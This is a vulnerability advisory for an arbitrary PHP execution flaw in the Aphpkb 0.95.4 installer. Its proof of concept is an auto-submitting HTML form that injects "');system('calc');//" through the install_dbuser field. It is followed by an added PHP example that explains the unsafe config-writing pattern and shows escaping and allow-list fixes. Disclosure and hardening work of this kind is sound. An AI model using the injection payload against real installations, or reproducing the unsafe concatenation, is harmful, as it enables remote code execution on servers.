Aphpkb 0.95.4 PHP Execution



EKU-ID: 283 CVE: OSVDB-ID:
Author: AutoSec Tools Published: 2011-05-20 Verified: Verified


<!------------------------------------------------------------------------
# Software................Aphpkb 0.95.4
# Vulnerability...........Arbitrary PHP Execution
# Threat Level............Very Critical (5/5)
# Download................http://aphpkb.sourceforge.net/
# Discovery Date..........5/18/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --PoC-->

<!-- Access any page after submitting this form -->
<html>
    <body onload="document.forms[0].submit()"> 
        <form method="POST" action="http://localhost/aphpkb/install/step5.php">  
            <input type="hidden" name="install_dbuser" value="');system('calc');//" />   
            <input type="submit" name="submit" />   
        </form>   
    </body>
</html>
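
How a value of this shape is neutralised when an installer writes settings to disk, as an added example that is not part of the original advisory and is not Aphpkb's code. It assumes step5.php stores install_dbuser in a PHP config file that later pages include; the function names and the DB_USER constant are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical installer helpers, not Aphpkb source.
// Assumption: the installer persists form fields such as install_dbuser
// into a PHP config file that every page later includes.

// Assumed vulnerable pattern: the raw value is pasted between quotes, so a
// quote inside the value ends the literal and the remainder is parsed as PHP.
function render_config_unsafe(array $post): string
{
    return "<?php\ndefine('DB_USER', '" . $post['install_dbuser'] . "');\n";
}

// Hardened pattern: allow-list the value, then let var_export() emit a
// correctly escaped PHP string literal.
function render_config_safe(array $post): string
{
    $user = $post['install_dbuser'] ?? null;
    if (!is_string($user) || preg_match('/\A[A-Za-z0-9_.@-]{1,64}\z/', $user) !== 1) {
        throw new InvalidArgumentException('invalid database user name');
    }
    return "<?php\ndefine('DB_USER', " . var_export($user, true) . ");\n";
}

// Value taken from the form on this page.
$poc = ['install_dbuser' => "');system('calc');//"];

// Unsafe rendering: the literal closes early and system(...) becomes code.
echo render_config_unsafe($poc);

// Escaping alone already keeps the whole value inside one string literal.
echo "<?php\ndefine('DB_USER', " . var_export($poc['install_dbuser'], true) . ");\n";

// The allow-list rejects the value before anything is written.
try {
    render_config_safe($poc);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A well-formed user name (constructed sample) passes through unchanged.
echo render_config_safe(['install_dbuser' => 'kb_app']);
```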